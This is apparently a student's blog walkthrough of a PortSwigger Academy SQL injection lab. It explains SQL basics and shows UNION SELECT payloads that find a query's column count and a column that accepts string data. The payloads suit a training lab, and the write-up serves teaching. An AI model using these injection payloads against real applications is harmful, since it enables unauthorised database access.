Portswigger Academy | SQLi Lab
WhoAmI
Hey I am Nour I am a Software engineering student and here are some of the communities that I am part of:
- IBM Community leader and IBMZ Student Ambassador
- AWS Community Builder
- Microsoft Student Ambassador
also, I love solving and creating OSINT CTFs at @Hacktoria connect with me on LinkedIn and Twitter
ps: I love talking to everyone
now enough introductions and let's get into today's lab hehe
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
NOTE: This Is For Educational Purposes Only
Solution
Before we do anything we need to understand the application so let's click around and note down the interesting functionalities that we find
now that we know the main functionalities let's see what we need to do in this lab
[Task 1] Determine the number of columns
To determine the number of columns we can do the same technique we used in the last lab which was using the UNION attack (we keep adding nulls until the error disappears and then the number of nulls will be equal to the number of columns)
Time for a quick SQL crash course
What is SQL?
- SQL or Structured Query Language is a language used for storing, manipulating and retrieving data in databases
What does a database consist of?
- A database is a table consisting of columns (fields) and rows (records) where each column contains a specific attribute and each row features a certain value for the corresponding attribute.
What is a Query?
- A query is a request for data or information from a database table or combination of tables.
- SELECT … FROM: used to select data from the database
- UNION: The UNION operator is used to combine the result of two or more SELECT statements (The number and order of the columns must be the same in all queries)
NOTE:
NULL is used for attributes that have no value
— — is used to comment the query
To check for SQL injection we can add ‘ in the URL, this will cause a syntax error
Now that we know that the application is vulnerable to SQL injection let’s craft an exploit, our goal is to know how many columns are there?
first, we need to intercept and modify the request that sets the product category filter.
we can start by modifying the category parameter with'UNION SELECT NULL, NULL--
(Don’t forget to encode the URL by selecting the payload then pressing CTRL + U)
But this will give an error because there are more columns, so we will keep adding, NULL until there are no errors
The final payload
'+UNION+SELECT+NULL,+NULL,+NULL--
now that we figured out the number of columns let's get into the next task which is identifying a column that is compatible with string data
[Task 2] Identify a column that is compatible with string data
Time for another SQL crash course:
What does data type mean?
In computer science and computer programming, a data type or simply type is an attribute of data that tells the compiler or interpreter how the programmer intends to use the data. Most programming languages support basic data types of integer numbers (of varying sizes), floating-point numbers (which approximate real numbers), characters, and Booleans. A data type constrains the values that an expression, such as a variable or a function, might take. This data type defines the operations that can be done on the data, the meaning of the data, and the way values of that type can be stored. A data type provides a set of values from which an expression (i.e. variable, function, etc.) may take its values. (According to Wikipedia)
What is a string data type?
In computer programming, a string is traditionally a sequence of characters (a word for example) (According to Wikipedia)
now that we know what is a string lets see what are we gonna do to find the column that has string
we will replace each null in the payload that we used before to know the number of columns with any random string (word) and if it gave an error then this means this column doesn't accept strings
The Final Payload:
'+UNION+SELECT+NULL,'Nour',+NULL--
Newsletter
I will be sharing my learning journey, cyber security news, new CVEs and study resources, and more, feel free to subscribe 😊 and please don’t forget to drink water 🌊
